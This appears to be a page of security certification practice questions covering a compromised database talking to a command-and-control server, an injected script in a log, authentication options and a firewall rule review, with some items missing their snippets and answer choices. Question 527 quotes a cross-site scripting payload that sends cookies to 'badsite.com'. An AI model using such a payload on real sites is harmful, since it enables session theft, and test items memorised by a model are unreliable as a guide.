Question 526

An organization has recently deployed an EDR solution across its laptops, desktops, and server infrastructure.
The organization's server infrastructure is deployed in an IaaS environment. A database within the non-production environment has been misconfigured with a routable IP and is communicating with a command and control server.
Which of the following procedures should the security responder apply to the situation? (Choose two.)
  • Question 527

    A security administrator notices the following line in a server's security log:
    <input name='credentials' type='TEXT' value='" +
    request.getParameter('><script>document.location='http://badsite.com/?q
    ='document.cooki e</script>') + "';
    The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
  • Question 528

    A security consultant is considering authentication options for a financial institution. The following authentication options are available. Drag and drop the security mechanism to the appropriate use case.
    Options may be used once.

    Question 529

    Given the following:

    Which of the following vulnerabilities is present in the above code snippet?
  • Question 530

    Compliance with company policy requires a quarterly review of firewall rules. You are asked to conduct a review on the internal firewall sitting between several internal networks. The intent of this firewall is to make traffic more secure. Given the following information perform the tasks listed below:
    Untrusted zone: 0.0.0.0/0
    User zone: USR 10.1.1.0/24
    User zone: USR2 10.1.2.0/24
    DB zone: 10.1.4.0/24
    Web application zone: 10.1.5.0/24
    Management zone: 10.1.10.0/24
    Web server: 10.1.5.50
    MS-SQL server: 10.1.4.70
    MGMT platform: 10.1.10.250
    Instructions: To perform the necessary tasks, please modify the DST port, SRC zone, Protocol, Action, and/or Rule Order columns. Type ANY to include all ports. Firewall ACLs are read from the top down. Once you have met the simulation requirements, click Save. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.

    Task 1) A rule was added to prevent the management platform from accessing the internet. This rule is not working. Identify the rule and correct this issue.
    Task 2) The firewall must be configured so that the SQL server can only receive requests from the web server.
    Task 3) The web server must be able to receive unencrypted requests from hosts inside and outside the corporate network.
    Task 4) Ensure the final rule is an explicit deny.
    Task 5) Currently the user zone can access internet websites over an unencrypted protocol. Modify a rule so that user access to websites is over secure protocols only.
    Instructions: To perform the necessary tasks, please modify the DST port, SRC zone, Protocol, Action, and/or Rule Order columns. Type ANY to include all ports. Firewall ACLs are read from the top down. Once you have met the simulation requirements, click Save. When you have completed the simulation, please select the Done button to submit. Once the simulation is submitted, please select the Next button to continue.